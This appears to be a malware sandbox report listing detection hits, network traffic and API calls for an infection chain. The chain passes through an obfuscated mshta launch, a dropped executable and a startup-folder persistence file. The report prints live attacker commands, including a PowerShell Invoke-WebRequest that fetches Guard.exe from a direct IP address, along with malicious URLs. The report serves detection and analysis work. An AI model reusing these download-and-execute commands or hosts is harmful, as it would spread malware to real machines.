Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7768, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 5632, ProcessName: SwiftWrite.pif
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8128, TargetFilename: C:\Users\user\AppData\Roaming\BFmcYQ.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BFmcYQ.exe" , ParentImage: C:\Users\user\AppData\Roaming\BFmcYQ.exe, ParentProcessId: 4332, ParentProcessName: BFmcYQ.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7636, ProcessName: powershell.exe
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BFmcYQ.exe" , ParentImage: C:\Users\user\AppData\Roaming\BFmcYQ.exe, ParentProcessId: 4332, ParentProcessName: BFmcYQ.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7636, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BFmcYQ.exe" , ParentImage: C:\Users\user\AppData\Roaming\BFmcYQ.exe, ParentProcessId: 4332, ParentProcessName: BFmcYQ.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7636, ProcessName: powershell.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7768, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: . \*i*\*2\msh*e https://tiffany-careers.com/duydemo, CommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/duydemo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/duydemo, ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 7684, ParentProcessName: forfiles.exe, ProcessCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/duydemo, ProcessId: 7748, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8036, ProcessName: svchost.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 4092, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-18T20:55:34.443305+010028033053Unknown Traffic192.168.2.749742147.45.49.15580TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-18T20:55:34.713269+010028330221A Network Trojan was detected147.45.49.15580192.168.2.749742TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeReversingLabs: Detection: 33%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe, 00000004.00000003.1714402239.000002CACB9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1706852595.000002CACBA07000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712006221.000002CACB968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719000851.000002CACB96B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714402239.000002CACB9F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1715259161.000002CAD10B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712160609.000002CACBA07000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1711638067.000002CACB96F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1706321294.000002CAD10A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714047185.000002CACB9EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714715303.000002CACB96B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1706852595.000002CACB9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1718910740.000002CACBA07000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1721670711.000002CACBA07000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719380903.000002CACB964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1706321294.000002CAD10B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712238556.000002CACB9EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712605510.000002CACBA1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712037269.000002CACBA0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720950548.000002CACB965000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1722420366.000002CAD10A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1722010344.000002CACBA1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712103472.000002CACBA17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707406806.000002CACB9FA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dvdplay.pdb source: mshta.exe, 00000004.00000003.1712006221.000002CACB968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719000851.000002CACB96B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714402239.000002CACB9F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1715259161.000002CAD10B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1711638067.000002CACB96F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714047185.000002CACB9EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714715303.000002CACB96B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1706852595.000002CACB9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1706321294.000002CAD10B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1712238556.000002CACB9EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707406806.000002CACB9FA000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0AC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,14_2_00007FF74D0AC7C0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D072F50 FindFirstFileExW,14_2_00007FF74D072F50
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0BA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,14_2_00007FF74D0BA874
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B6428 FindFirstFileW,FindNextFileW,FindClose,14_2_00007FF74D0B6428
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0BA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,14_2_00007FF74D0BA4F8
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0BA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,14_2_00007FF74D0BA350
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0ABC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00007FF74D0ABC70
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0AB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00007FF74D0AB7C0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,14_2_00007FF74D0B72A8
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B71F4 FindFirstFileW,FindClose,14_2_00007FF74D0B71F4
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A84005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00A84005
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8494A GetFileAttributesW,FindFirstFileW,FindClose,21_2_00A8494A
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,21_2_00A8C2FF
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,21_2_00A8CD9F
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8CD14 FindFirstFileW,FindClose,21_2_00A8CD14
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_00A8F5D8
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_00A8F735
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A8FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,21_2_00A8FA36
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A83CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00A83CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F74005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00F74005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7494A GetFileAttributesW,FindFirstFileW,FindClose,27_2_00F7494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_00F7C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,27_2_00F7CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7CD14 FindFirstFileW,FindClose,27_2_00F7CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_00F7F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_00F7F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F7FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_00F7FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F73CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00F73CE2
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 19:55:42 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sat, 14 Dec 2024 20:29:43 GMTETag: "da2a8-62940cebb8084"Accept-Ranges: bytesContent-Length: 893608Keep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 0d 00 00 04 00 00 15 cd 0d 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc d0 0b 00 7c 01 00 00 00 90 0c 00 50 d7 00 00 00 00 00 00 00 00 00 00 00 86 0d 00 a8 1c 00 00 00 70 0d 00 ac 71 00 00 90 3b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5b 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 e7 08 00 00 10 00 00 00 e8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8e fd 02 00 00 00 09 00 00 fe 02 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 00 0c 00 00 52 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 d7 00 00 00 90 0c 00 00 d8 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 71 00 00 00 70 0d 00 00 72 00 00 00 14 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: GET /test.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /BFmcYQ.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /EsgMle.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49742 -> 147.45.49.155:80
Source: Network trafficSuricata IDS: 2833022 - Severity 1 - ETPRO MALWARE Possible Malicious Second Stage Download with Terse Headers : 147.45.49.155:80 -> 192.168.2.7:49742
Source: global trafficHTTP traffic detected: GET /duydemo HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /hvshp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0BE968 InternetQueryDataAvailable,InternetReadFile,14_2_00007FF74D0BE968
Source: global trafficHTTP traffic detected: GET /duydemo HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /test.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /BFmcYQ.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /hvshp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /EsgMle.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: tiffany-careers.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1E158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1F076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1E158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/EsgMle.txt
Source: BFmcYQ.exe, 0000000E.00000002.1668946917.0000019AF6E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/hvshp
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.H
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
